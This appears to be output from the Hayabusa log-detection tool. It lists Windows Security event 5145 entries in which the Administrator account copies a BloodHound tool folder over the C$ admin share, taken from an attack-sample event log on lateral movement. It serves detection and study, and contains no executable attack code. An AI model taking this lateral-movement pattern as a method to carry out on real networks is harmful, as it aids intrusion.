+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
